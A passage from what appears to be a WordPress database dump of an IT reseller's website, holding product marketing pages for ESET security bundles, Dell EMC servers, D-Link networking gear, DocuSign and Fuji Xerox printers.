behavior-based detection easily managed via a single online console. Provides:\r\n<ul>\r\n 	<li>Targeted attacks protection</li>\r\n 	<li>Advanced persistent threats detection</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Zero-day threats detection</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>Future ready cybersecurity for enterprise</strong></h2>\r\n<h3><strong>Bundled solutions for enterprise</strong></h3>\r\nFits all security requirements. Flexible and scalable to any IT environment.\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Elite Targeted Attack Protection</strong></h4>\r\n</li>\r\n</ol>\r\nFull-scale protection encompassing all ESETâ€™s latest technologies and services for eliminating all known and unknown threats. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n 	<li>Manual Malware Analysis</li>\r\n 	<li>Forensic Analysis &amp; Consulting</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Targeted Attack Protection</strong></h4>\r\n</li>\r\n</ol>\r\nComplete, seamless prevention, detection and response solution, incorporating total visibility, for remediation of any security issue in the network. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\r\n</li>\r\n</ol>\r\nComprehensive, easily managed protection, incorporating off-premise cloud sandboxing leveraging machine learning and behavior-based detection. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n</ul>\r\n<ol start=\"4\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered protection utilizing multiple technologies and incorporating visibility management and reporting across all operating systems. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n</ul>\r\n<ol start=\"5\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Mail Protection</strong></h4>\r\n</li>\r\n</ol>\r\nBusiness solution incorporating antispam, anti-phishing and Cloud Sandbox Analysis for the complete protection of mailboxes and mail servers. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Mail Security</li>\r\n</ul>\r\n<ol start=\"6\">\r\n 	<li>\r\n<h4><strong>ESET Identity &amp; Data Protection</strong></h4>\r\n</li>\r\n</ol>\r\nBusiness solution for superior and enhanced protection of an organizationâ€™s data and intellectual property. Includes:\r\n<ul>\r\n 	<li>Two-factor Authentication</li>\r\n 	<li>Endpoint Encryption</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n&nbsp;','ESET','','publish','closed','closed','','eset','','','2019-09-30 11:15:37','2019-09-30 03:15:37','',0,'https://bintara.com.my/?page_id=1477',0,'page','',0),(1478,1,'2018-12-11 13:00:26','2018-12-11 05:00:26','<h2 class=\"heading\">Servers built for today\'s most demanding workloads and tomorrow\'s.</h2>\r\n<div class=\"rte \">\r\n\r\nPowerEdge MX powers both traditional and emerging workloads with up to 5x network throughput,Â simple unified management and multigenerational investment protection.\r\n\r\n&nbsp;\r\n<h3>Rack Servers</h3>\r\nReady your data center to handle any workload. PowerEdge rack servers combine a highly scalable architecture and optimum balance of compute and memory to maximize performance across the widest range of applications.\r\n<ul>\r\n 	<li>World record in SAP performance11</li>\r\n 	<li>Widest range of in-server storage options ever in PowerEdge servers</li>\r\n 	<li>IT Pro â€œEditorâ€™s Choiceâ€ award with 5-star ratings (R640 &amp; R740xd)</li>\r\n 	<li>#1 in price/performance (R740xd)24</li>\r\n 	<li>Powerful 4-socket performance and GPU acceleration for data analytics, AI and machine learning</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Modular Infrastructure</h3>\r\nCreate an agile, future-ready data center with flexible, easily expandable compute, networking and storage. The PowerEdge modular portfolio allows you to precisely tailor, quickly deploy and easily manage infrastructure while lowering operating costs.\r\n<ul>\r\n 	<li>PowerEdge MX â€“ Modular, integrated solution with easy deployment, management, and maximum longevity</li>\r\n 	<li>PowerEdge FX Series â€“ Hybrid platform with the density of blade servers and the simplicity of rack-based systems</li>\r\n 	<li>PowerEdge VRTX â€“ Compact chassis integrating servers, storage, networking and management</li>\r\n 	<li>PowerEdge C Series â€“ Accelerated computing platform for high-performance cognitive workloads</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Tower Servers</h3>\r\nPowerEdge tower servers are designed to grow with your organization, at your pace.\r\n<ul>\r\n 	<li>Flexible configurations with large internal capacities</li>\r\n 	<li>Broad portfolio for SOHO, ROBO and SMB markets</li>\r\n 	<li>Rackable for continued use as companies grow</li>\r\n</ul>\r\n\r\n\r\n&nbsp;\r\n<h3>Systems Management Software</h3>\r\n<div class=\"info-text server-info-text\">\r\n\r\nTake control and automate the full IT lifecycle with the OpenManage portfolio. Increase the productivity, reliability and cost effectiveness of your servers while making IT operations more efficient.\r\n<ul class=\"server-list\">\r\n 	<li>Powerful infrastructure automation with OpenManage Enterprise</li>\r\n 	<li>Anytime, anywhere access to PowerEdge server status with OpenManage Mobile</li>\r\n 	<li>Leverage existing management consoles with OpenManage Integrations for VMware vCenter<sup>Â®</sup>, Microsoft<sup>Â®</sup>Â System Center and Ansible Modules</li>\r\n</ul>\r\n\r\n\r\n&nbsp;\r\n<h3 class=\"title\">Industrial-Grade Servers</h3>\r\nThe new PowerEdge XR2 server delivers long life for harsh or space-constrained environments, without compromising on performance.\r\n<ul class=\"server-list\">\r\n 	<li>Secure storage â€“ Up to 8 high-capacity SSDs with up to 30TB of storage</li>\r\n 	<li>Shock certified to 40G of operational shock with SSDs<sup>29</sup></li>\r\n 	<li>Extreme temperature range â€“ Cold start down to -15Â°C and up to 45Â°C with excursions up to 55Â°C for 8 hours at a time</li>\r\n</ul>\r\n</div>\r\n\r\n\r\n&nbsp;\r\n<h3>Ready Nodes</h3>\r\n<div class=\"info-text server-info-text\">\r\n\r\nBuild or scale with PowerEdge servers pre-configured for your workloads.\r\n<ul class=\"server-list\">\r\n 	<li>Known-good configurations for VMware vSAN, Microsoft Storage Spaces Direct, VxFlex and SAP HANA</li>\r\n 	<li>Save time on configuration and testing</li>\r\n 	<li>Solution-level customer support included</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n</div>\r\n</div>','Dell EMC','','publish','closed','closed','','dell-emc','','','2019-09-25 15:44:12','2019-09-25 07:44:12','',0,'https://bintara.com.my/?page_id=1478',0,'page','',0),(1480,1,'2018-12-11 13:00:51','2018-12-11 05:00:51','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP</p><p>Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W</p><p>Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Access Control List (ACL) feature to enhances network security</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>Cable diagnostics function to help troubleshooting wiring problem</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Built-in SNMP MIB for remote Network Management Systems</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>Â </p><center>[maxbutton id=\"6\" ]</center><p>Â </p>','D-Link','','publish','closed','closed','','d-link','','','2019-09-25 15:38:04','2019-09-25 07:38:04','',0,'https://bintara.com.my/?page_id=1480',0,'page','',0),(1481,1,'2018-12-11 13:00:58','2018-12-11 05:00:58','<h2>Get to \"yes\" faster with DocuSign electronic signatures</h2>https://youtu.be/sKoNwKcGKF0		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h2>Sign. Send. Success.</h2><p>Use DocuSign to complete approvals and agreements in minutes or hoursâ€”not daysâ€”from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.</p><h2>Modernize your System of Agreement</h2><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSignâ€™s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignatureÂ® but also the many options of a System of Agreement Platform.</p>		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h2>Delight customers with an easier way to do business</h2><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.</p><h2>DocuSign makes your business run better</h2><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.</p><p><strong>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes </strong>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.</p>		\n										<img width=\"438\" height=\"212\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png 438w, https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1-300x145.png 300w\" sizes=\"(max-width: 438px) 100vw, 438px\" />											\n										<img width=\"392\" height=\"184\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png 392w, https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07-300x141.png 300w\" sizes=\"(max-width: 392px) 100vw, 392px\" />											\n		<p><strong>Works with the applications, services and devices your business already uses</strong> DocuSign fits right into your existing systems so youâ€™ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.</p><p><strong>The reliable, globally-trusted service for electronic signatures</strong><br />Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.</p>		\n										<img width=\"460\" height=\"144\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png 460w, https://bintara.com.my/wp-content/uploads/2019/01/SMB-300x94.png 300w\" sizes=\"(max-width: 460px) 100vw, 460px\" />											\n		<h3>Delight your customers, partners, and employees with a better way of doing business</h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. Itâ€™s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.</p><h3>Your company\'s digital future is here</h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','DocuSign','','publish','closed','closed','','docusign','','','2019-09-25 15:50:17','2019-09-25 07:50:17','',0,'https://bintara.com.my/?page_id=1481',0,'page','',0),(1482,1,'2018-12-11 14:14:08','2018-12-11 06:14:08','<h2>Printers</h2>\r\n<strong>Exceptional print quality, productivity and ease of use.</strong>\r\n\r\nFuji Xerox printers and all-in-one printers are ideal fit for both small &amp; medium business environments, whether you need vibrant color, black-and-white printing, or more robust features to handle sophisticated document workflows. All of our printers and desktop all-in-one printers offer built-in productivity and reliability you can count on.\r\n\r\n&nbsp;\r\n<h2>Multifunction Printers</h2>\r\n<strong>Print, copy, scan and fax all in one device.</strong>\r\n\r\nFuji Xerox multifunction printers (MFPs) deliver flexibility with print, copy, scan and fax all from one device. Additional features like device embedded solutions and cloud-based solutions that help you handle various information efficiently, while also meeting your security requirements. Now you can have the freedom to work in the most efficient and productive way, saving time and resources.\r\n\r\nNo matter which multifunction printer you choose, youâ€™ll get easy-to-use interfaces, reliable paper handling, advanced security and sophisticated tools for adding required flexibility and efficiency in your regular jobs. Designed to handle your workgroupâ€™s high volumes, Fuji Xerox multifunction printers can automate repetitive tasks and customize workflows.\r\n\r\n&nbsp;\r\n<h2>Production Print</h2>\r\n<strong>Digital press models in full colour, monochrome or spot colour deliver benchmark print quality and productivity.</strong>\r\n\r\nFuji Xerox provides solutions in the graphic communications, in-plant and production print environments with high-volume printing requirements. These solutions enable on-demand printing of a wide range of applications, including publishing, transaction printing, direct mail, print-on-demand, short runs, packaging, photo publishing and marketing collateral. Our high-volume digital printing press models and production printers are available in full color or monochrome and combine vibrant quality with high speed and productivity. A coordinated approach of print and digital media is used to deliver messages and information efficiently and effectively, by utilizing on-demand printing and various printing technologies to timely communicate relevant information to target customers. As a global partner in developing compelling communication that captures attention and encourages response from customers, Fuji Xerox delivers personalized content to customers through collaborations with partner companies in the industry.\r\n\r\n&nbsp;\r\n<h2>Software</h2>\r\nYour multifunction printer may already print, copy, scan and fax. But when you add software solutions to the equation, you\'ll multiply your productivity and create aÂ transformational experience. Simplify and automate your everyday work, better manage your information, improve document security, enable easy scanning, and get the most out of your hardware investment as you continue your digital journey.\r\n\r\n&nbsp;\r\n<h2>Wide Format</h2>\r\nFulfil your large format A0 print and scan requirements with Fuji Xerox wide format multifunction printers. Constant growing needs of digitalization and connected devices in Engineering departments can be effectively managed with Fuji Xerox DocuWide series coming with in-build high speed, high-resolution color scanner and excellent quality print output.\r\n\r\n&nbsp;\r\n<h2>Scanners</h2>\r\nFuji Xerox scanners provide the digital on-ramp for businesses to transform their hard-copy documents into an efficient document management solution. Our wide range of scanners are able to cover needs starting from small businesses to professional users with very high speed scanning requirements. While hardware may just be the beginning of your scanning requirement, Fuji Xeroxâ€™s leading document management software accompanying these devices beautifully complements its hardware to simplify and automate your processes at no extra 